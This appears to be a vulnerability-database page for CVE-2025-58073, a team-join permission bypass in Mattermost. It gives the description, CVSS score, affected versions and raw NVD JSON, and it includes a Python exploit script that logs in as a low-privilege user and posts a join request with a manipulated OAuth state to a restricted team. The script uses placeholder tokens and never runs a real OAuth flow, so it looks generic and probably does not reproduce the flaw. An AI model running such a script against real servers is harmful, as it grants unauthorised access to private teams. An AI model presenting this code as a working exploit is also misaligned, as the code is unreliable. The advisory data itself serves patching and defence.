CVE-2025-58073

Description

Mattermost versions 10.11.x <= 10.11.1, 10.10.x <= 10.10.2, 10.5.x <= 10.5.10 fail to verify a user has permission to join a Mattermost team using the original invite token which allows any attacked to join any team on a Mattermost server regardless of restrictions via manipulating the OAuth state.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

Mattermost 10.11.0 <= 10.11.x <= 10.11.1

Mattermost 10.10.0 <= 10.10.x <= 10.10.2

Mattermost 10.5.0 <= 10.5.x <= 10.5.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-58073 PoC - Mattermost Team Invite Token Permission Bypass # Exploit: Manipulating OAuth state to bypass team join permission verification import requests import re from urllib.parse import urlparse, parse_qs TARGET_SERVER = "https://mattermost.example.com" ATTACKER_SESSION = requests.Session() def login_as_attacker(username, password): """Login to Mattermost as a low-privilege user""" login_url = f"{TARGET_SERVER}/api/v4/users/login" resp = ATTACKER_SESSION.post(login_url, json={"login_id": username, "password": password}) if resp.status_code == 200: token = resp.headers.get("Token") ATTACKER_SESSION.headers.update({"Authorization": f"Bearer {token}"}) print(f"[+] Logged in as: {username}") return True return False def get_invite_token(team_id): """Obtain a valid invite token for a team (e.g., from a public channel or leaked link)""" invite_url = f"{TARGET_SERVER}/api/v4/teams/{team_id}/invite_email" # In practice, attacker may obtain invite token from various sources # such as intercepted links, public posts, or shared channels resp = ATTACKER_SESSION.post(invite_url, json={"emails": ["[email protected]"]}) # Extract token from response or use a captured token return "captured_invite_token_here" def exploit_oauth_state_bypass(target_team_id, invite_token): """ Exploit: Manipulate OAuth state parameter to bind invite token to an arbitrary restricted team, bypassing join permission checks. """ # Step 1: Initiate OAuth flow with manipulated state oauth_state = { "token": invite_token, "team_id": target_team_id # Target restricted team } # Step 2: Send join request with manipulated state join_url = f"{TARGET_SERVER}/api/v4/teams/{target_team_id}/members" payload = { "team_id": target_team_id, "invite_token": invite_token, "state": oauth_state # Manipulated OAuth state } resp = ATTACKER_SESSION.post(join_url, json=payload) if resp.status_code == 201: print(f"[+] SUCCESS: Joined restricted team {target_team_id}") print(f"[+] Response: {resp.json()}") return True else: print(f"[-] Failed: {resp.status_code} - {resp.text}") return False if __name__ == "__main__": # Login as low-privilege attacker if login_as_attacker("attacker_user", "password123"): # Target a restricted team target_team = "restricted_team_id_here" # Obtain any valid invite token token = get_invite_token("any_team_id") # Exploit the vulnerability exploit_oauth_state_bypass(target_team, token)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58073
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58073
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58073/
[4] VulDB https://vuldb.com/cve/CVE-2025-58073
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58073", "sourceIdentifier": "[email protected]", "published": "2025-10-16T09:15:34.863", "lastModified": "2025-10-21T17:51:42.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.1, 10.10.x <= 10.10.2, 10.5.x <= 10.5.10 fail to verify a user has permission to join a Mattermost team using the original invite token which allows any attacked to join any team on a Mattermost server regardless of restrictions via manipulating the OAuth state."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.11", "matchCriteriaId": "9A7F5FBF-4910-4376-96DF-0549BA5259AE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.10.0", "versionEndExcluding": "10.10.3", "matchCriteriaId": "409352A4-2061-42B0-B130-F6889A62025A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.3", "matchCriteriaId": "D4B91178-97CA-4799-A853-685F04C33F9E"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}